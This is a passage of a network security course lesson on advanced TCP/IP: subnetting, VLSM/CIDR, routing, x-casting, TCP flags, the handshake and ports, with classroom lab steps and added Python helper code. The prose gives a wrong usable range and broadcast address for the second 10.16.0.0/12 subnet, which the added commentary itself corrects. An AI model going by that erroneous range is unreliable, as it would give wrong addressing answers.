The subnet mask can be represented in different formats. For example, one common format is to list the IP address followed by the full subnet mask, such as this: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write, is to count and record the number of bits that are used as 1s in the subnet mask. For example, in the default subnet mask for Class C there are 24 bits designated as 1. So, to use the second format, list the IP address followed by a slash and the number of bits masked, such as this: 192.168.10.1/24.

Subnetting Example

In the event that you need to split a network into more than one range, such as having different buildings or floors, you will need to subdivide the network. The following example will step you through the process of splitting a network and creating the subnet mask necessary to support the resulting subnetworks. Let's say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnet mask and need to break this up into 12 network ranges to support, for example, the 12 major departments in your corporate building. Here's what you should do:

1. Determine how many bits, in binary, it takes to make up the number of subnetworks you need to create. In binary, 12 is 1100, so you will need 4 bits.

2. Take 4 bits from the host side of the subnet mask and AND them to the network side, effectively changing your subnet mask from 255.0.0.0 to 255.240.0.0. As you know, the subnet mask tells you where the dividing line between network and host bits resides. You started with a network ID of 10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this:

   00001010.00000000.00000000.00000000 (IP address for network)
   11111111.00000000.00000000.00000000 (subnet mask)

   Your dividing line is at the end of the first octet (eight bits starting from the left). You have one big network with a network ID of 10.0.0.0, a range of usable addresses from 10.0.0.1 to 10.255.255.254, and a broadcast address of 10.255.255.255. The new, divided network looks like this:

   00001010.0000 0000.00000000.00000000 (IP address for network)
   11111111.1111 0000.00000000.00000000 (subnet mask)

   Notice that the network/host dividing line is now in the middle of the second octet. All of your networks will have binary addresses that will look like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x represents one of the variable bits used to create your subnetworks and y represents a bit on the host side of the address.

3. Determine the subnetwork addresses by changing the value of the x bits. The first possible permutation is the 00001010.0000 network; the second is the 00001010.0001 network, and so forth. The following table lists all of the possible subnetwork addresses (notice the pattern?).

Subnetwork  Binary Address                        Decimal Address
First       00001010.0000 0000.00000000.00000000  10.0.0.0
Second      00001010.0001 0000.00000000.00000000  10.16.0.0
Third       00001010.0010 0000.00000000.00000000  10.32.0.0
Fourth      00001010.0011 0000.00000000.00000000  10.48.0.0
Fifth       00001010.0100 0000.00000000.00000000  10.64.0.0
Sixth       00001010.0101 0000.00000000.00000000  10.80.0.0
Seventh     00001010.0110 0000.00000000.00000000  10.96.0.0
Eighth      00001010.0111 0000.00000000.00000000  10.112.0.0
Ninth       00001010.1000 0000.00000000.00000000  10.128.0.0
Tenth       00001010.1001 0000.00000000.00000000  10.144.0.0
Eleventh    00001010.1010 0000.00000000.00000000  10.160.0.0
Twelfth     00001010.1011 0000.00000000.00000000  10.176.0.0
Thirteenth  00001010.1100 0000.00000000.00000000  10.192.0.0
Fourteenth  00001010.1101 0000.00000000.00000000  10.208.0.0
Fifteenth   00001010.1110 0000.00000000.00000000  10.224.0.0
Sixteenth   00001010.1111 0000.00000000.00000000  10.240.0.0

For the first network, the network ID is 10.0.0.0 with a subnet mask of 255.240.0.0. The first usable address is 10.0.0.1, and the last usable address is 10.15.255.254. The broadcast address is 10.15.255.255 (the next possible IP address would be 10.16.0.0, which is the network ID of the second network). The second network has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and a broadcast address of 10.16.255.255.

Notice that you needed only 12 networks, but you have 16. That can happen, depending on the number of networks needed. For example, if you had needed 20 networks, you would have needed to move the network/host dividing line over 5 bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, you would have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 that you used for the first example), which would have given you 32 subnetworks, even though you needed only 20. Consider it room for corporate growth!

Note that any combination of addressing can be represented in different text. For example, you may come across a resource that defines the IP address in decimal, and the subnet mask in hexadecimal. You must be able to quickly recognize the addressing as defined. Use the following task to test your ability to quickly perform these conversions.

TASK 1A-1
Layering and Address Conversions

1. Describe how layering is beneficial to the function of networking.

   By using a layered model, network communications can be broken into smaller chunks. These smaller chunks can each have a specific purpose, or function, and in the event an error happens in one chunk, it is possible that only that error be addressed, instead of starting over from scratch.

2. If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF-00-00, to which IP network does your computer belong? Provide both decimal and Hex notations.

   In decimal, the network address is 192.168.0.0; in Hex, the network address is C0-A8-00-00.

3. If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, to which IP network does your computer belong? Provide both decimal and Hex notations.

   In decimal, the network address is 192.168.0.0; in Hex, the network address is C0-A8-00-00.

Routing

router: An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.

We will get into routing in more detail later, but we need to address the basics now. Being familiar with a network and how one host will communicate with another host within the same network, what do you think will happen if a host needs to send information to a host that is not in its network? This is exactly the situation where routing is needed. You need to route that information from your network to the receiving host's network. Of course, the device that makes this possible is the router. The first router you will encounter on your way out of your network is the default gateway. This is the device to which your computer will send all traffic, once it determines that the destination host is not local (on the same network as itself). After the default gateway gets a packet of information destined for host User1 on network X, it looks at its routing table (think of this as a sort of directory, telling the router that traffic destined for networks C, G, F, and X should go out interface 1, traffic destined for networks E, A, B, and R should go out interface 2, and so forth), then the router forwards the packet out through interface 1. The destination network may or may not be attached to interface 1; the router doesn't really care at this point; it just forwards the packet on according to the information in its routing table. This process repeats from one router to the next until the packet finally reaches the router that is attached to the same network as the destination host. When the packet reaches this router, which is usually also the destination host's default gateway, it is sent out on the network as a unicast directed to the destination host User1.
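The two forwarding decisions described above, as an added example that is not part of the course text: the host's local-or-gateway choice, and the router's table lookup. The routing table, interface names and host addresses are constructed for illustration (172.16.0.1 is the LEFT-side classroom gateway from Task 1A-2); where more than one table entry matches, the most specific (longest prefix) entry wins, which is how routers actually select and goes one step beyond the single-match case the text describes.

```python
"""Host and router forwarding decisions (added example, constructed data)."""


def dotted_to_int(addr: str) -> int:
    a, b, c, d = (int(o) for o in addr.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def prefix_to_mask(prefix: int) -> int:
    """Number of masked bits -> 32-bit mask, e.g. 16 -> 0xFFFF0000 (255.255.0.0)."""
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def same_network(a: str, b: str, prefix: int) -> bool:
    """ANDing both addresses with the mask; equal results mean the same network."""
    mask = prefix_to_mask(prefix)
    return (dotted_to_int(a) & mask) == (dotted_to_int(b) & mask)


def host_next_hop(host: str, prefix: int, gateway, destination: str):
    """What the sending host does with a packet.

    Returns "direct" for a destination on its own network, the default gateway
    address otherwise, or None when no default gateway is configured, which is
    the "Destination host unreachable" situation produced in Task 1A-2.
    """
    if same_network(host, destination, prefix):
        return "direct"
    return gateway  # None if the gateway was removed


# Constructed routing table: (network, prefix, outgoing interface).
# The 0.0.0.0/0 entry is a default route that matches any destination.
ROUTING_TABLE = [
    ("172.16.0.0", 16, "interface 1"),
    ("172.18.0.0", 16, "interface 2"),
    ("172.18.10.0", 24, "interface 3"),  # more specific than 172.18.0.0/16
    ("0.0.0.0", 0, "interface 4"),
]


def select_interface(destination: str, table=ROUTING_TABLE):
    """Router lookup: every matching entry is a candidate; the longest prefix wins.

    Returns None when nothing matches, i.e. the router has no route at all.
    """
    best = None
    for network, prefix, interface in table:
        if same_network(destination, network, prefix):
            if best is None or prefix > best[0]:
                best = (prefix, interface)
    return None if best is None else best[1]


if __name__ == "__main__":
    # Constructed LEFT-side host 172.16.10.5/16 using the classroom gateway 172.16.0.1.
    for dest in ("172.16.10.9", "172.18.10.9"):
        hop = host_next_hop("172.16.10.5", 16, "172.16.0.1", dest)
        print(f"{dest}: host sends {hop}; router forwards via {select_interface(dest)}")
    print("gateway removed:", host_next_hop("172.16.10.5", 16, None, "172.18.10.9"))
```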

VLSM and CIDR

The standard methods of subnet masking discussed earlier are effective; however, there are instances where further subdividing is required, or more control of the addressing of the network is desired. In these cases, you can use either of the following two options: Variable Length Subnet Masking (VLSM) or Classless Interdomain Routing (CIDR).

Think back to the previous example of subnet masking. In particular, let's take a closer look at the fourth network. It was intended to be used by the IT staff; however, they want to be able to break the rather large network block given to them into smaller, more manageable blocks. Specifically, they need five smaller subnetworks to be created from their network block of 10.48.0.0 with a subnet mask of 255.240.0.0.

This time, let's represent the IP addresses and subnet masks using the slash method: 10.48.0.0/12. Notice the IP address stays the same, but we replace the subnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, of course, corresponds to 255.240.0.0). Now, back to the IT staff's networking issue. You have an already subnetted network (10.48.0.0/12) that you would like to split into five smaller networks. To begin, you need to ask the same starting question: How many bits does it take to make 5? In binary, 5 is 101, so you will need three bits. Then, add three bits to the present subnet mask (don't worry that it has already been subnetted before; that doesn't matter). So, now you have 10.48.0.0/15 as your first network address and new subnet mask.

The new variable range is 00001010.0011xxx y.yyyyyyyy.yyyyyyyy, where the binary numbers will not change, x represents the variable bits that will make up the networks, and y designates the host bits.

So, what are the new network addresses?

Subnetwork  Binary Address                        Decimal Address
First       00001010.0011000 0.00000000.00000000  10.48.0.0
Second      00001010.0011001 0.00000000.00000000  10.50.0.0
Third       00001010.0011010 0.00000000.00000000  10.52.0.0
Fourth      00001010.0011011 0.00000000.00000000  10.54.0.0
Fifth       00001010.0011100 0.00000000.00000000  10.56.0.0
Sixth       00001010.0011101 0.00000000.00000000  10.58.0.0
Seventh     00001010.0011110 0.00000000.00000000  10.60.0.0
Eighth      00001010.0011111 0.00000000.00000000  10.62.0.0

For the first network, the network ID is 10.48.0.0, the usable addresses are 10.48.0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second, the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254, and the broadcast address is 10.51.255.255, and so forth. Did you notice that you have eight possible networks when you needed only five? Again, you can consider it just having more room for expansion.
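The subnetting procedure from the Subnetting Example and the VLSM split above, carried out in code. This is an added example for this edition, not code from the course; the function names are my own, and it reproduces both of the text's cases (10.0.0.0/8 into 12 subnetworks, then 10.48.0.0/12 into 5) as well as the ANDing used in Task 1A-1.

```python
"""Subnetting and VLSM worked through in code (added example)."""


def dotted_to_int(addr: str) -> int:
    a, b, c, d = (int(o) for o in addr.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def int_to_dotted(value: int) -> str:
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))


def prefix_to_mask(prefix: int) -> int:
    """/12 -> 0xFFF00000 (255.240.0.0): the 12 leftmost bits set, contiguously."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be between 0 and 32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def mask_to_prefix(mask: str) -> int:
    """255.240.0.0 -> 12. Rejects masks whose 1 bits are not contiguous."""
    m = dotted_to_int(mask)
    prefix = bin(m).count("1")
    if m != prefix_to_mask(prefix):
        raise ValueError(f"non-contiguous subnet mask: {mask}")
    return prefix


def network_of(addr: str, prefix: int) -> str:
    """ANDing the address with the mask yields the network it belongs to."""
    return int_to_dotted(dotted_to_int(addr) & prefix_to_mask(prefix))


def same_network(a: str, b: str, prefix: int) -> bool:
    """Two hosts sharing a network ID talk directly; otherwise a router is needed."""
    return network_of(a, prefix) == network_of(b, prefix)


def bits_needed(count: int) -> int:
    """Fewest host bits to borrow so that 2**bits >= count.

    Agrees with the text for 12 (4 bits), 20 (5 bits) and 5 (3 bits). It differs
    from the text's "count the binary digits" rule only when count is an exact
    power of two, where one bit fewer suffices (16 subnetworks need 4 bits, not 5).
    """
    if count < 1:
        raise ValueError("need at least one subnetwork")
    return (count - 1).bit_length()


def subnets(network: str, prefix: int, count: int):
    """Split network/prefix into at least `count` equal subnetworks.

    Returns (new_prefix, rows) where each row is
    (network ID, first usable host, last usable host, broadcast address).
    Works on an already subnetted block too, which is the VLSM case in the text.
    """
    extra = bits_needed(count)
    new_prefix = prefix + extra
    if new_prefix > 30:
        raise ValueError("not enough host bits left for usable hosts")
    base = dotted_to_int(network) & prefix_to_mask(prefix)
    block = 1 << (32 - new_prefix)  # addresses in each subnetwork
    rows = []
    for i in range(1 << extra):
        net = base + i * block
        bcast = net + block - 1
        rows.append((int_to_dotted(net), int_to_dotted(net + 1),
                     int_to_dotted(bcast - 1), int_to_dotted(bcast)))
    return new_prefix, rows


if __name__ == "__main__":
    # The text's two examples: 10.0.0.0/8 into 12, then the fourth block into 5.
    for net, pfx, n in (("10.0.0.0", 8, 12), ("10.48.0.0", 12, 5)):
        new_pfx, rows = subnets(net, pfx, n)
        print(f"{net}/{pfx} -> {len(rows)} subnetworks, mask "
              f"{int_to_dotted(prefix_to_mask(new_pfx))} (/{new_pfx})")
        for row in rows:
            print("  network %-12s usable %-14s to %-14s broadcast %s" % row)
```

Compare the printed second /12 network with the table: its last usable address is 10.31.255.254 and its broadcast 10.31.255.255, which is what the third network's ID of 10.32.0.0 requires.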

X-casting

When a packet is sent from one host to another, the process of routing functions and the packet is sent as defined. However, the process is different if one host is trying to reach more than one destination, or if one message is to be received by every other host in the network. These types of communication are referred to as broadcasting, multicasting, and unicasting.

A broadcast is a communication that is sent out from a single transmitting host and is destined for all possible receivers on a segment (generally, everyone in the network, since the routers that direct traffic from one network to another are generally used to stop broadcasts, thereby creating broadcast domain boundaries). Broadcasting can be done for many reasons, such as locating another host. For a MAC broadcast, the broadcast address used is FF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on the network settings. For example, if you are on network 192.168.10.0/24, the broadcast address is 192.168.10.255.

A multicast is a communication that is sent out to a group of receivers on the network. Multicasting is often implemented as a means for directing traffic from the presenter of a videoconference to the audience. In comparison to the broadcast, which all receivers on the segment will receive, those who wish to receive a multicast must join a group to do so. Group membership is often very dynamic and controlled by a user or an application. Currently, Class D addresses are used for multicasting purposes. Remember, Class D has IP addresses in the range of 224.0.0.0 to 239.255.255.255.

Unicast is a term that was created after multicasting and broadcasting were already defined. A unicast is a directed communication between a single transmitter and a single receiver. This is how most communication between two hosts happens, with Host A specifically communicating with Host B.

TASK 1A-2
Routers and Subnetting

1. You are using a host that has an IP address of 192.168.10.23 and a subnet mask of 255.255.255.0. You are trying to reach a host with the IP address 192.168.11.23. Will you need to go through a router? Explain your response.
Yes, you will need to go through a router. Your subnet mask defines you as belonging to network 192.168.10.0, and the remote host you are trying to reach does not belong to your network.

2. Boot your computer to Windows 2000, and log on as Administrator, with a blank (null) password.

3. From the Start menu, choose Settings→Network And Dial-up Connections.

4. Right-click the Classroom Hub interface and choose Properties.

5. Select Internet Protocol (TCP/IP) and click Properties.

6. Click the Advanced button, and verify that the IP Settings tab is displayed. Under Default Gateways, record the IP address here:
For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. For the RIGHT side, it is 172.18.0.1.
Be prepared to diagram or otherwise explain the classroom setup. The recommended classroom layout is shown in Figure 0-1.

7. Select the IP address you just recorded, and click Remove. Click OK three times.

8. Open a command prompt, and ping an address that is not on your local network. For instance, if you are on the LEFT side of the classroom, you could ping an address in the 172.18.10.0 network, and if you are on the RIGHT side of the classroom, you could ping an address in the 172.16.10.0 network. Observe the message you receive.
The text Destination Host unreachable is displayed. Your computer knows that the ping packet is supposed to go to a computer that is outside your local network, but it does not know how to get it there.

9. Switch to the Network And Dial-up Connections Control Panel, and display the properties of the Classroom Hub interface.

10. Select Internet Protocol (TCP/IP), click Properties, and click Advanced. On the IP Settings tab, click the Add button found in the Default Gateway area.

11. In the TCP/IP Gateway Address box, enter the IP address you recorded earlier in the task, click Add, and click OK three times.

12. Switch back to the command prompt, and try to ping the remote address again.

13. Observe the message you receive.
This time, as long as the other computer's default gateway is correctly configured, you should be successful in pinging the remote computer. This is because your computer now knows to send traffic to the router if that traffic is destined for another network. (How the routers know where to send the traffic is covered later in the course.) Contact your instructor if your ping attempt is not successful.

14. Close all open windows.

Students must be able to ping all computers within the classroom for the remaining tasks to work properly. If any students are not successful in the second ping attempt, help them troubleshoot the issue.

Hardening The Infrastructure (SCP)
Lesson 1: Advanced TCP/IP
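The routing decision from step 1 of Task 1A-2 and the broadcast and multicast ranges described under X-casting, as an added example that is not part of the course material. It uses only the standard-library ipaddress module; the addresses are the ones quoted in the text, and the 255.254.0.0 mask applied to 10.48.0.0 is an assumption that reproduces the ranges given for the first network above.

```python
import ipaddress

# Added example (not course code): subnet membership, broadcast address and
# address-type checks. The 255.254.0.0 mask used for 10.48.0.0 is an
# assumption that yields the ranges quoted in the text.

def subnet_summary(address, mask):
    """Return (network ID, first usable, last usable, broadcast) as strings."""
    net = ipaddress.ip_network(f"{address}/{mask}", strict=False)
    first = net.network_address + 1
    last = net.broadcast_address - 1
    return (str(net.network_address), str(first), str(last),
            str(net.broadcast_address))

def needs_router(local_ip, mask, remote_ip):
    """True when remote_ip lies outside the local host's subnet, so the packet
    must be handed to the default gateway instead of delivered directly."""
    local_net = ipaddress.ip_network(f"{local_ip}/{mask}", strict=False)
    return ipaddress.ip_address(remote_ip) not in local_net

def cast_type(local_ip, mask, dest_ip):
    """Classify a destination as the text does: multicast for Class D
    (224.0.0.0 to 239.255.255.255), broadcast for the subnet's directed
    broadcast address or 255.255.255.255, otherwise unicast."""
    local_net = ipaddress.ip_network(f"{local_ip}/{mask}", strict=False)
    dest = ipaddress.ip_address(dest_ip)
    if dest.is_multicast:
        return "multicast"
    if dest in (local_net.broadcast_address,
                ipaddress.ip_address("255.255.255.255")):
        return "broadcast"
    return "unicast"

if __name__ == "__main__":
    print(subnet_summary("10.48.0.0", "255.254.0.0"))
    print(needs_router("192.168.10.23", "255.255.255.0", "192.168.11.23"))
    for dest in ("192.168.10.5", "192.168.10.255", "224.0.0.9"):
        print(dest, cast_type("192.168.10.23", "255.255.255.0", dest))
```

The strict=False argument lets a host address be passed with its mask; ipaddress then derives the network ID and broadcast address by itself.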

Topic 1B
Analyzing the Three-way Handshake

security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.

Although a great deal of emphasis is given to IP due to the addressing and masking issues, TCP deserves equal attention from the security professional. In addition to TCP, the other protocol that functions as a transport protocol is UDP. This topic will concentrate on TCP; however, a brief discussion on UDP is warranted. The following table provides a brief comparison of the two protocols.

Comparing TCP and UDP

TCP                       UDP
Connection-oriented       Connectionless
Slower communications     Faster communications
Considered reliable       Considered unreliable
Transport Layer           Transport Layer

TCP provides a connection-oriented means of communication, whereas UDP provides connectionless communication. The connection-oriented function of TCP means it can ensure reliable transmission, and can recover if transmission errors occur. The connectionless function of UDP means that packets are sent with the understanding they will make it to the other host, with no means of ensuring the reliability of the transmission.

UDP is considered faster because less work is done between the two hosts that are communicating. Host 1 simply sends a packet to the address of host 2. There is nothing built into UDP to provide for host 1 checking to see if host 2 received the packet, or for host 2 sending a message back to host 1, acknowledging receipt.

TCP Features

TCP provides the functions of connection-oriented communication by using features such as the three-way handshake, acknowledgements, and sequence numbers. In addition to these features, a significant part of TCP is the use of control flags. There are six TCP control flags in a TCP header, each with a specific meaning.

TCP Flags

The TCP flags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These flags may also be identified as S, ack, F, R, P, and urg. Each of these flags occupies the space of one bit in the header, and if they are assigned a value of 1, they are considered on. The function of each flag is identified as follows:

The SYN, or S, flag represents the first part of establishing a connection. The synchronizing of communication will generally be in the first packet of communication.

The ACK, or ack, flag represents acknowledgement of receipt of data from the sending host. This is sent during the second part of establishing a connection, in response to the sending host's SYN request.

The FIN, or F, flag represents the sender's intentions of terminating the communication in what is known as a graceful manner.

The RESET, or R, flag represents the sender's intentions to reset the communication.

The PUSH, or P, flag is used when the sending host requires data to be pushed directly to the receiving application, and not fill in a buffer.

The URGENT, or urg, flag represents that this data should take precedence over other data transmissions.

Sequence and Acknowledgement Numbers

In addition to the TCP flags, another critical issue of TCP is that of numbers: sequence and acknowledgement numbers, to be specific. Because TCP has been defined as a reliable protocol that has the ability to provide for connection-oriented communication, there must be a mechanism to provide these features. Sequence and acknowledgement numbers are what provide this.

Sequence Numbers

The sequence number is found in the TCP header of each TCP packet and is a 32-bit value. These numbers allow the two hosts a common ground for communication, and allow for the hosts to identify packets sent and received. If a large Web page requires several TCP packets for transmission, sequence numbers are used by the receiving host to reassemble the packets in the proper order and provide the full Web page for viewing.

When a host sends the request to initiate a new connection, an Initial Sequence Number (ISN) must be chosen. There are different algorithms by different vendors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a 32-bit number that increments by one every 4 microseconds.

Acknowledgement Numbers

The acknowledgement number is also found in the TCP header of each TCP packet, and is also a 32-bit value. These numbers allow the two hosts to be given a receipt of data delivery. An acknowledgement number is in the packet header in response to a sequence number in the sending packet.

In the event that the sending host does not receive an acknowledgement for a transmitted packet in the defined timeframe, the sender will retransmit the packet. This is how TCP provides reliable delivery. If a packet seems to have been lost, the sender will retransmit it.
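The six flag bits and the 32-bit sequence and acknowledgement fields described above, read from raw header bytes, as an added example that is not part of the course material. The field values used in the demonstration (a client on port 1025 opening a session to port 80) are constructed; the checksum is left at zero because computing it requires the IP pseudo-header, which is outside this example.

```python
import struct

# Added example (not course code): build and decode the fixed 20-byte TCP
# header so the control flags and the sequence/acknowledgement numbers can be
# read from raw bytes. Demo values are constructed; checksum is left at 0.

# Bit positions of the control flags, in the order the text names them.
FLAG_BITS = {"SYN": 0x02, "ACK": 0x10, "FIN": 0x01,
             "RST": 0x04, "PSH": 0x08, "URG": 0x20}

# Network byte order: src port, dst port, seq, ack, data-offset byte,
# flags byte, window, checksum, urgent pointer.
HEADER_FMT = "!HHIIBBHHH"

def build_tcp_header(src_port, dst_port, seq, ack, flags, window=8192):
    """Return a 20-byte TCP header (no options) with the named flags set."""
    flag_byte = 0
    for name in flags:
        flag_byte |= FLAG_BITS[name]
    data_offset = 5 << 4          # 5 x 32-bit words = 20 bytes; low nibble reserved
    return struct.pack(HEADER_FMT, src_port, dst_port, seq & 0xFFFFFFFF,
                       ack & 0xFFFFFFFF, data_offset, flag_byte, window, 0, 0)

def parse_tcp_header(data):
    """Decode the fixed part of a TCP header; options, if present, are not parsed."""
    if len(data) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    (src, dst, seq, ack, offset_byte, flag_byte,
     window, _checksum, urg_ptr) = struct.unpack(HEADER_FMT, data[:20])
    return {
        "src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
        "header_len": (offset_byte >> 4) * 4,
        "flags": [name for name, bit in FLAG_BITS.items() if flag_byte & bit],
        "window": window, "urgent_pointer": urg_ptr,
    }

def describe(seg):
    """One-line summary in the style of a protocol analyzer's Summary pane."""
    flags = ",".join(seg["flags"]) or "none"
    return (f'{seg["src_port"]} -> {seg["dst_port"]} [{flags}] '
            f'seq={seg["seq"]} ack={seg["ack"]}')

if __name__ == "__main__":
    # Constructed: first segment of a session, SYN set, ack number 0.
    syn = build_tcp_header(1025, 80, 0x12345678, 0, ["SYN"])
    print(syn.hex())
    print(describe(parse_tcp_header(syn)))
```

The flags byte is the low six bits of the 16-bit word that follows the acknowledgement number; the data offset in the high nibble of the preceding byte tells a parser where the payload begins when options are present.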

Connections

All communication in TCP/IP is done with connections between two hosts. Each connection is opened (or established), data is sent, and the connection is closed (or torn down). These connections have very specific rules they must follow. There are two different states of the open portion of this process: Passive Open and Active Open. Passive Open is when a running application tells TCP that it is ready to receive inbound requests via TCP. The application is assuming inbound requests are coming, and is prepared to serve those requests. This is also known as the listening state, as the application is listening for requests to communicate.

Active Open is when a running application tells TCP to start a communication session with a remote host (which is in Passive Open state). It is possible for two hosts in Active Open to begin communication. It is not a requirement that the remote host be in Passive Open, but that is the most common scenario.

Connection Establishment

In order for the sequence and acknowledgement numbers to have any function, a session between the two hosts must be established. This connection establishment is called the three-way handshake. The three-way handshake involves three distinct steps, which are detailed as follows (please refer to Figure 1-5 when reading this section):

1. Host A sends a segment to Host C with the following:
SYN = 1 (The session is being synchronized.)
ACK = 0 (There is no value in the ACK field, so this flag is a 0.)
Sequence Number = x, where x is a variable. (x is Host A's ISN.)
Acknowledgement Number = 0

2. Host C receives Host A's segment and responds to Host A with the following:
SYN = 1 (The session is still being synchronized.)
ACK = 1 (The acknowledgement flag is now set, as there is an ack value in this segment.)
Sequence Number = y, where y is a variable. (y is Host C's ISN.)
Acknowledgement Number = x + 1 (The sequence number from Host A, plus 1.)

3. Host A receives Host C's segment and responds to Host C with the following:
SYN = 0 (Session is synchronized with this segment; further requests are not needed.)
ACK = 1 (The ack flag is set in response to the SYN from the previous segment.)
Sequence Number = x + 1 (This is the next sequence number in series.)
Acknowledgement Number = y + 1 (The sequence number from Host C, plus 1.)

At this point, the hosts are synchronized and the session is established in both directions, with data transfer to follow.

The Three-way Handshake

Figure 1-5: The three-way handshake.
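The exchange described in the three steps above, as an added example that is not part of the course material: a small Python model of the handshake and also of the four-segment graceful termination that the next section (Connection Termination) describes, using the text's variables x, y, s and p, together with the RFC 793 ISN clock mentioned under Sequence Numbers. The segment dictionaries and the check_acknowledgements helper are constructs of this example, not of any TCP implementation.

```python
# Added example (not course code): model the TCP three-way handshake and the
# four-segment graceful termination using the text's variables x, y, s and p,
# and verify the rule each step applies: an ACK answering a SYN or FIN carries
# that SYN/FIN's sequence number plus 1.

def rfc793_isn(microseconds_since_boot):
    """ISN clock as described by RFC 793: a 32-bit counter that increments by
    one every 4 microseconds and wraps at 2**32."""
    return (microseconds_since_boot // 4) % (1 << 32)

def segment(sender, receiver, syn=0, ack=0, fin=0, seq=None, ack_num=None):
    """One TCP segment reduced to the fields the text discusses.
    seq=None stands for the text's 'Sequence Number = Not Present'."""
    return {"from": sender, "to": receiver, "SYN": syn, "ACK": ack,
            "FIN": fin, "seq": seq, "ack_num": ack_num}

def three_way_handshake(x, y):
    """Host A (ISN x) opens a session to Host C (ISN y)."""
    return [
        segment("A", "C", syn=1, ack=0, seq=x, ack_num=0),          # step 1
        segment("C", "A", syn=1, ack=1, seq=y, ack_num=x + 1),      # step 2
        segment("A", "C", syn=0, ack=1, seq=x + 1, ack_num=y + 1),  # step 3
    ]

def graceful_termination(s, p):
    """Host A performs the Active Close (first FIN, sequence s); Host C performs
    the Passive Close and then closes its own direction with sequence p."""
    return [
        segment("A", "C", fin=1, ack=1, seq=s, ack_num=p),          # step 1
        segment("C", "A", fin=0, ack=1, seq=None, ack_num=s + 1),   # step 2
        segment("C", "A", fin=1, ack=1, seq=p, ack_num=s + 1),      # step 3
        segment("A", "C", fin=0, ack=1, seq=None, ack_num=p + 1),   # step 4
    ]

def check_acknowledgements(segments):
    """True when every ACK that answers a SYN or FIN within this exchange
    carries that SYN/FIN's sequence number plus 1. An ACK of earlier data
    (such as the ack number p in the first FIN) is outside the exchange and
    is not judged."""
    expected = {}   # host -> the ack number its peer must send next
    for seg in segments:
        peer = seg["to"]
        if seg["ACK"] and peer in expected:
            if seg["ack_num"] != expected.pop(peer):
                return False
        if seg["SYN"] or seg["FIN"]:
            expected[seg["from"]] = seg["seq"] + 1
    return True

if __name__ == "__main__":
    x, y = rfc793_isn(4_000), rfc793_isn(9_000_000)   # constructed clock readings
    session = three_way_handshake(x, y) + graceful_termination(x + 500, y + 300)
    for seg in session:
        print(seg)
    print(check_acknowledgements(three_way_handshake(x, y)))
```

Changing the acknowledgement number in step 2 to anything other than x + 1 makes check_acknowledgements return False, which is exactly the condition under which Host A would not complete the handshake.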

Connection Termination

In addition to specific steps that are involved in the establishment of a session between two hosts, there are equally specific steps in the termination of the session. There are two methods of ending a session using TCP. One is considered graceful, and the other is non-graceful.

A graceful shutdown happens when one host sends a message (using the FIN flag) to the other, stating it is time to end the session; the other acknowledges; and they both end the session. A non-graceful shutdown happens when one host simply sends a message (using the RESET flag) to the other, indicating the communication has stopped, with no acknowledgements and no further messages sent. In this section, we will investigate the details of the standard graceful termination.

As you saw earlier, it requires three segments to establish a TCP session between two hosts. The other side of the session, the graceful termination, requires four segments. Four segments are required because TCP is a full-duplex communication protocol (meaning data can be flowing in both directions independently). As per the specifications of TCP, either end of a communication can end the session by sending a FIN, which has a sequence number just as a SYN has a sequence number.

Similar to the Active and Passive Opens mentioned earlier, there are also Active and Passive Closes. The host that begins the termination sequence, by sending the first FIN, is the host performing the Active Close. The host that receives the first FIN is the host that is performing the Passive Close. The graceful teardown of a session is detailed as follows (please refer to Figure 1-6 when reading this section):

1. Host A initiates the session termination to Host C with the following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number, based on current communication.)
Sequence Number (FIN number) = s (s is a variable based on the current communication.)
Acknowledgement Number = p (p is a variable based on the current communication.)

2. Host C receives Host A's segment and replies with the following:
FIN = 0 (This segment is not requesting closure of the session.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present (As there is no FIN, there is no sequence number required.)
Acknowledgement Number = s + 1 (This is the response to Host A's FIN.)

3. Host C initiates the session termination in the opposite direction with the following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number.)
Sequence Number = p (p is a variable based on the current communication.)
Acknowledgement Number = s + 1 (This is the same as in the previous segment.)

4. Host A receives the segments from Host C and replies with the following:
FIN = 0 (This segment does not request a termination, there is no SYN.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present
Acknowledgement Number = p + 1 (This is Host C's sequence number, plus 1.)

At this point the session has been terminated. Communication in both directions has had a FIN requested and an acknowledgement to the FIN, closing the session.

Figure 1-6: Connection termination.

Ports

You have been introduced to the fact that IP deals with addressing and the sending/receiving of data between two hosts, and you have been introduced to the fact that TCP can be selected to provide reliable delivery of data. However, if a client sends a request to a server that is running many services, such as WWW, NNTP, SMTP, and FTP, how does the server know which application is supposed to receive the request? The answer is by specifying ports.

Port numbers are located in the TCP or UDP header, and they are 16-bit values, ranging from 0 to 65535. Port numbers can be assigned to specific functions or applications. Ports can also be left open for dynamic use by two hosts during communication. There are ranges of ports for each function. There are three main categories of ports: well-known, registered, and dynamic.

Categories of Ports

